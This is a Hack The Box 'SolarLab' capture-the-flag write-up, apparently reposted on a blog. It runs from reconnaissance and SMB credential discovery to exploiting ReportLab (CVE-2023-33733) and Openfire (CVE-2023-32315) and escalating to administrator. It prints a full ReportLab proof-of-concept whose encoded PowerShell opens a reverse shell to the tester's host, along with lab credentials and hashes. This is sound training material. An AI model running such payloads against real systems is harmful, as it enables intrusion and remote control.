hackthebox - Solarlab writeup

发布于:2024-07-06 ⋅ 阅读:(71) ⋅ 点赞:(0)
微信交流群:https://732903.hlcode.cn/?id=NK1fWUR

hachthebox - Solarlab writeup

recon

nmap

sudo nmap -T4 --min-rate 5000 -sVCS -p80,139,135,445,6791 -oA nmap/tcp_port 10.10.11.16
[sudo] password for wkend: 
Sorry, try again.
[sudo] password for wkend: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-06 14:20 CST
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.37s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: SolarLab Instant Messenger
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-06T06:21:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.38 seconds

Add domains to / etc / hosts

sudo bash -c 'echo "10.10.11.16 solarlab.htb report.solarlab.htb" |tee -a /etc/hosts'

web

http://solarlab.htb/
http://report.solarlab.htb:6791/login

foothold

smb-445

connect by smb to anonymous

smbclient

请添加图片描述

smbmap

请添加图片描述

netexec

请添加图片描述

download xlsx
请添加图片描述

find passwd
在这里插入图片描述

web-6791

find valid user:
在这里插入图片描述
check user blake.byte,blakeB???
在这里插入图片描述

yes,blakeB is a valid user

blakeB:ThisCanB3typedeasily1@

在这里插入图片描述

PDF generated

在这里插入图片描述

PDF file:
在这里插入图片描述

the document is generated using the Report Lab PDF Library

在这里插入图片描述

exploit

CVE-2023-33733

| https://github.com/c53elyas/CVE-2023-33733

poc:

‰<para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

Training Request text and plug the malicious script:

在这里插入图片描述

get shell

user:blakeB

在这里插入图片描述

capture the user flag:

在这里插入图片描述

shell spawn

create shell.exe
在这里插入图片描述

upload shell.exe

在这里插入图片描述

get session on meterpreter:

在这里插入图片描述

getprivs

在这里插入图片描述

find user openfire:

在这里插入图片描述

find openfire service:

在这里插入图片描述

search openfire service port:

在这里插入图片描述

port forward

open a reverse port forward(Attacker Machine):
在这里插入图片描述

forwared local port to remote port(Victim Machine):

在这里插入图片描述

web-openfire:

在这里插入图片描述

exploit-web-openfire

| https://github.com/miko550/CVE-2023-32315

在这里插入图片描述

with credentials, login openfire success:

在这里插入图片描述

Lateral movement

upload exploit jar file and pass is 123:
在这里插入图片描述

The management tool can be found by going to the home GUI page, server -> server_setting -> management tools

在这里插入图片描述

dropdown bar and select system command:

在这里插入图片描述

get-shell

user:openfire

get shell with user openfire:

在这里插入图片描述

Privilege Escalation

discovered a password key in openfire.script
在这里插入图片描述

openfire_decrypt tool:
| https://github.com/c0rdis/openfire_decrypt

...
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
...

get administrator password:

ThisPasswordShouldDo!@

在这里插入图片描述

get system

在这里插入图片描述

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布